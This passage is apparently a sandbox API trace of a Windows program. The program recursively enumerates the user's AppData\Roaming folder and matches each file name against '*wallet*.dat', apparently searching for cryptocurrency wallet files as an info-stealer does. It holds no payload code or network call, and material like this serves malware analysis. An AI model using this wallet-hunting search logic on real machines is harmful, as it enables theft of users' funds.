(pszStr1="7Di9dW_BhxfMaOBZAifk.flv", pszStr2=".") returned 9 [0234.651] StrCmpCA (pszStr1="7Di9dW_BhxfMaOBZAifk.flv", pszStr2="..") returned 9 [0234.651] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7Di9dW_BhxfMaOBZAifk.flv") returned 62 [0234.651] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.651] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="7Di9dW_BhxfMaOBZAifk.flv") returned 24 [0234.652] PathMatchSpecA (pszFile="7Di9dW_BhxfMaOBZAifk.flv", pszSpec="*wallet*.dat") returned 0 [0234.652] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7Di9dW_BhxfMaOBZAifk.flv\\*") returned 64 [0234.652] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\7Di9dW_BhxfMaOBZAifk.flv\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x578e64d0, ftCreationTime.dwLowDateTime=0x1d81cf3, ftCreationTime.dwHighDateTime=0xd04b92a0, ftLastAccessTime.dwLowDateTime=0x1d82327, ftLastAccessTime.dwHighDateTime=0xd04b92a0, ftLastWriteTime.dwLowDateTime=0x1d82327, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x201b, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x440037, cFileName="i", cAlternateFileName="")) returned 0xffffffff [0234.652] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a5aa460, ftCreationTime.dwHighDateTime=0x1d8215e, ftLastAccessTime.dwLowDateTime=0x67e5bdb0, ftLastAccessTime.dwHighDateTime=0x1d8297d, ftLastWriteTime.dwLowDateTime=0x67e5bdb0, ftLastWriteTime.dwHighDateTime=0x1d8297d, nFileSizeHigh=0x0, nFileSizeLow=0x1714c, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="9SdM.jpg", cAlternateFileName="")) returned 1 [0234.652] StrCmpCA (pszStr1="9SdM.jpg", pszStr2=".") returned 11 [0234.652] StrCmpCA (pszStr1="9SdM.jpg", pszStr2="..") returned 11 [0234.652] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9SdM.jpg") returned 46 [0234.652] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.652] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="9SdM.jpg") returned 8 [0234.652] PathMatchSpecA (pszFile="9SdM.jpg", pszSpec="*wallet*.dat") returned 0 [0234.652] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9SdM.jpg\\*") returned 48 [0234.652] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9SdM.jpg\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x1a5aa460, ftCreationTime.dwLowDateTime=0x1d8215e, ftCreationTime.dwHighDateTime=0x67e5bdb0, ftLastAccessTime.dwLowDateTime=0x1d8297d, ftLastAccessTime.dwHighDateTime=0x67e5bdb0, ftLastWriteTime.dwLowDateTime=0x1d8297d, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1714c, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x530039, cFileName="d", cAlternateFileName="")) returned 0xffffffff [0234.652] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d25a6e0, ftCreationTime.dwHighDateTime=0x1d819ed, ftLastAccessTime.dwLowDateTime=0xf1a1c350, ftLastAccessTime.dwHighDateTime=0x1d827d4, ftLastWriteTime.dwLowDateTime=0xf1a1c350, ftLastWriteTime.dwHighDateTime=0x1d827d4, nFileSizeHigh=0x0, nFileSizeLow=0x11e7c, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="a3nD8d4sJ5LORnkZhU.avi", cAlternateFileName="A3ND8D~1.AVI")) returned 1 [0234.652] StrCmpCA (pszStr1="a3nD8d4sJ5LORnkZhU.avi", pszStr2=".") returned 51 [0234.652] StrCmpCA (pszStr1="a3nD8d4sJ5LORnkZhU.avi", pszStr2="..") returned 51 [0234.652] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\a3nD8d4sJ5LORnkZhU.avi") returned 60 [0234.653] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.653] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="a3nD8d4sJ5LORnkZhU.avi") returned 22 [0234.653] PathMatchSpecA (pszFile="a3nD8d4sJ5LORnkZhU.avi", pszSpec="*wallet*.dat") returned 0 [0234.653] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\a3nD8d4sJ5LORnkZhU.avi\\*") returned 62 [0234.653] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\a3nD8d4sJ5LORnkZhU.avi\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x1d25a6e0, ftCreationTime.dwLowDateTime=0x1d819ed, ftCreationTime.dwHighDateTime=0xf1a1c350, ftLastAccessTime.dwLowDateTime=0x1d827d4, ftLastAccessTime.dwHighDateTime=0xf1a1c350, ftLastWriteTime.dwLowDateTime=0x1d827d4, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x11e7c, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x330061, cFileName="n", cAlternateFileName="")) returned 0xffffffff [0234.653] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47cfc8b0, ftCreationTime.dwHighDateTime=0x1d81f3f, ftLastAccessTime.dwLowDateTime=0x54e1e7f0, ftLastAccessTime.dwHighDateTime=0x1d82542, ftLastWriteTime.dwLowDateTime=0x54e1e7f0, ftLastWriteTime.dwHighDateTime=0x1d82542, nFileSizeHigh=0x0, nFileSizeLow=0xe9fb, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="AApkOzh7NuUgqRD4T4T.bmp", cAlternateFileName="AAPKOZ~1.BMP")) returned 1 [0234.653] StrCmpCA (pszStr1="AApkOzh7NuUgqRD4T4T.bmp", pszStr2=".") returned 19 [0234.653] StrCmpCA (pszStr1="AApkOzh7NuUgqRD4T4T.bmp", pszStr2="..") returned 19 [0234.653] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AApkOzh7NuUgqRD4T4T.bmp") returned 61 [0234.653] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.653] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="AApkOzh7NuUgqRD4T4T.bmp") returned 23 [0234.653] PathMatchSpecA (pszFile="AApkOzh7NuUgqRD4T4T.bmp", pszSpec="*wallet*.dat") returned 0 [0234.653] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AApkOzh7NuUgqRD4T4T.bmp\\*") returned 63 [0234.653] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AApkOzh7NuUgqRD4T4T.bmp\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x47cfc8b0, ftCreationTime.dwLowDateTime=0x1d81f3f, ftCreationTime.dwHighDateTime=0x54e1e7f0, ftLastAccessTime.dwLowDateTime=0x1d82542, ftLastAccessTime.dwHighDateTime=0x54e1e7f0, ftLastWriteTime.dwLowDateTime=0x1d82542, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xe9fb, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x410041, cFileName="p", cAlternateFileName="")) returned 0xffffffff [0234.654] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="Adobe", cAlternateFileName="")) returned 1 [0234.654] StrCmpCA (pszStr1="Adobe", pszStr2=".") returned 19 [0234.654] StrCmpCA (pszStr1="Adobe", pszStr2="..") returned 19 [0234.654] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe") returned 43 [0234.654] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.654] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="Adobe") returned 5 [0234.654] PathMatchSpecA (pszFile="Adobe", pszSpec="*wallet*.dat") returned 0 [0234.654] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*") returned 45 [0234.654] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x6e1da0 [0234.655] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.655] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0234.656] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.656] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.656] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x1, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0234.656] StrCmpCA (pszStr1="Flash Player", pszStr2=".") returned 24 [0234.656] StrCmpCA (pszStr1="Flash Player", pszStr2="..") returned 24 [0234.656] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player") returned 56 [0234.656] StrCmpCA (pszStr1="Adobe", pszStr2="") returned 65 [0234.656] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Adobe\\Flash Player") returned 18 [0234.656] PathMatchSpecA (pszFile="Flash Player", pszSpec="*wallet*.dat") returned 0 [0234.656] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned 58 [0234.656] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e18e0 [0234.656] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.656] FindNextFileA (in: hFindFile=0x6e18e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.657] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.657] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.657] FindNextFileA (in: hFindFile=0x6e18e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0234.657] StrCmpCA (pszStr1="NativeCache", pszStr2=".") returned 32 [0234.657] StrCmpCA (pszStr1="NativeCache", pszStr2="..") returned 32 [0234.657] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 68 [0234.657] StrCmpCA (pszStr1="Adobe\\Flash Player", pszStr2="") returned 65 [0234.657] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Adobe\\Flash Player\\NativeCache") returned 30 [0234.657] PathMatchSpecA (pszFile="NativeCache", pszSpec="*wallet*.dat") returned 0 [0234.657] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned 70 [0234.657] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1820 [0234.658] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.658] FindNextFileA (in: hFindFile=0x6e1820, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.659] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.659] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.659] FindNextFileA (in: hFindFile=0x6e1820, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0234.659] FindClose (in: hFindFile=0x6e1820 | out: hFindFile=0x6e1820) returned 1 [0234.665] FindNextFileA (in: hFindFile=0x6e18e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 0 [0234.665] FindClose (in: hFindFile=0x6e18e0 | out: hFindFile=0x6e18e0) returned 1 [0234.665] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x1, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0234.665] FindClose (in: hFindFile=0x6e1da0 | out: hFindFile=0x6e1da0) returned 1 [0234.666] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf16e5c0, ftCreationTime.dwHighDateTime=0x1d82814, ftLastAccessTime.dwLowDateTime=0xdfdbd600, ftLastAccessTime.dwHighDateTime=0x1d82992, ftLastWriteTime.dwLowDateTime=0xdfdbd600, ftLastWriteTime.dwHighDateTime=0x1d82992, nFileSizeHigh=0x0, nFileSizeLow=0x16d9d, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="akyiyUiVWWZCN.jpg", cAlternateFileName="AKYIYU~1.JPG")) returned 1 [0234.666] StrCmpCA (pszStr1="akyiyUiVWWZCN.jpg", pszStr2=".") returned 51 [0234.666] StrCmpCA (pszStr1="akyiyUiVWWZCN.jpg", pszStr2="..") returned 51 [0234.666] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\akyiyUiVWWZCN.jpg") returned 55 [0234.666] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.666] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="akyiyUiVWWZCN.jpg") returned 17 [0234.666] PathMatchSpecA (pszFile="akyiyUiVWWZCN.jpg", pszSpec="*wallet*.dat") returned 0 [0234.666] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\akyiyUiVWWZCN.jpg\\*") returned 57 [0234.666] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\akyiyUiVWWZCN.jpg\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0xaf16e5c0, ftCreationTime.dwLowDateTime=0x1d82814, ftCreationTime.dwHighDateTime=0xdfdbd600, ftLastAccessTime.dwLowDateTime=0x1d82992, ftLastAccessTime.dwHighDateTime=0xdfdbd600, ftLastWriteTime.dwLowDateTime=0x1d82992, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x16d9d, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x6b0061, cFileName="y", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.666] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55dbf840, ftCreationTime.dwHighDateTime=0x1d81d53, ftLastAccessTime.dwLowDateTime=0xb1a54190, ftLastAccessTime.dwHighDateTime=0x1d8273f, ftLastWriteTime.dwLowDateTime=0xb1a54190, ftLastWriteTime.dwHighDateTime=0x1d8273f, nFileSizeHigh=0x0, nFileSizeLow=0x4d74, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="B8F1yjv.m4a", cAlternateFileName="")) returned 1 [0234.666] StrCmpCA (pszStr1="B8F1yjv.m4a", pszStr2=".") returned 20 [0234.666] StrCmpCA (pszStr1="B8F1yjv.m4a", pszStr2="..") returned 20 [0234.666] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B8F1yjv.m4a") returned 49 [0234.666] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.666] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="B8F1yjv.m4a") returned 11 [0234.666] PathMatchSpecA (pszFile="B8F1yjv.m4a", pszSpec="*wallet*.dat") returned 0 [0234.666] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B8F1yjv.m4a\\*") returned 51 [0234.667] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\B8F1yjv.m4a\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x55dbf840, ftCreationTime.dwLowDateTime=0x1d81d53, ftCreationTime.dwHighDateTime=0xb1a54190, ftLastAccessTime.dwLowDateTime=0x1d8273f, ftLastAccessTime.dwHighDateTime=0xb1a54190, ftLastWriteTime.dwLowDateTime=0x1d8273f, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4d74, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x380042, cFileName="F", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.667] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1536f8a0, ftCreationTime.dwHighDateTime=0x1d827ce, ftLastAccessTime.dwLowDateTime=0x3788b650, ftLastAccessTime.dwHighDateTime=0x1d82918, ftLastWriteTime.dwLowDateTime=0x3788b650, ftLastWriteTime.dwHighDateTime=0x1d82918, nFileSizeHigh=0x0, nFileSizeLow=0xdeb5, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="bjfTxcqp.bmp", cAlternateFileName="")) returned 1 [0234.667] StrCmpCA (pszStr1="bjfTxcqp.bmp", pszStr2=".") returned 52 [0234.667] StrCmpCA (pszStr1="bjfTxcqp.bmp", pszStr2="..") returned 52 [0234.667] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bjfTxcqp.bmp") returned 50 [0234.667] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.667] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="bjfTxcqp.bmp") returned 12 [0234.667] PathMatchSpecA (pszFile="bjfTxcqp.bmp", pszSpec="*wallet*.dat") returned 0 [0234.667] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bjfTxcqp.bmp\\*") returned 52 [0234.667] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bjfTxcqp.bmp\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x1536f8a0, ftCreationTime.dwLowDateTime=0x1d827ce, ftCreationTime.dwHighDateTime=0x3788b650, ftLastAccessTime.dwLowDateTime=0x1d82918, ftLastAccessTime.dwHighDateTime=0x3788b650, ftLastWriteTime.dwLowDateTime=0x1d82918, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xdeb5, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x6a0062, cFileName="f", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.667] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x555ed110, ftCreationTime.dwHighDateTime=0x1d821c9, ftLastAccessTime.dwLowDateTime=0x22616fc0, ftLastAccessTime.dwHighDateTime=0x1d8265b, ftLastWriteTime.dwLowDateTime=0x22616fc0, ftLastWriteTime.dwHighDateTime=0x1d8265b, nFileSizeHigh=0x0, nFileSizeLow=0x176fc, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="eFwC NcGjDH.mp4", cAlternateFileName="EFWCNC~1.MP4")) returned 1 [0234.667] StrCmpCA (pszStr1="eFwC NcGjDH.mp4", pszStr2=".") returned 55 [0234.667] StrCmpCA (pszStr1="eFwC NcGjDH.mp4", pszStr2="..") returned 55 [0234.667] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eFwC NcGjDH.mp4") returned 53 [0234.667] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.667] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="eFwC NcGjDH.mp4") returned 15 [0234.668] PathMatchSpecA (pszFile="eFwC NcGjDH.mp4", pszSpec="*wallet*.dat") returned 0 [0234.668] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eFwC NcGjDH.mp4\\*") returned 55 [0234.668] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eFwC NcGjDH.mp4\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x555ed110, ftCreationTime.dwLowDateTime=0x1d821c9, ftCreationTime.dwHighDateTime=0x22616fc0, ftLastAccessTime.dwLowDateTime=0x1d8265b, ftLastAccessTime.dwHighDateTime=0x22616fc0, ftLastWriteTime.dwLowDateTime=0x1d8265b, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x176fc, nFileSizeLow=0x0, dwReserved0=0x197ad8, dwReserved1=0x460065, cFileName="w", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0234.668] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1932c90, ftCreationTime.dwHighDateTime=0x1d81ea1, ftLastAccessTime.dwLowDateTime=0x44f631a0, ftLastAccessTime.dwHighDateTime=0x1d8230a, ftLastWriteTime.dwLowDateTime=0x44f631a0, ftLastWriteTime.dwHighDateTime=0x1d8230a, nFileSizeHigh=0x0, nFileSizeLow=0x1757c, dwReserved0=0x0, dwReserved1=0x197ad8, cFileName="ekNsAJS.mp3", cAlternateFileName="")) returned 1 [0234.668] StrCmpCA (pszStr1="ekNsAJS.mp3", pszStr2=".") returned 55 [0234.668] StrCmpCA (pszStr1="ekNsAJS.mp3", pszStr2="..") returned 55 [0234.668] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ekNsAJS.mp3") returned 49 [0234.668] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.668] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="ekNsAJS.mp3") returned 11 [0234.668] 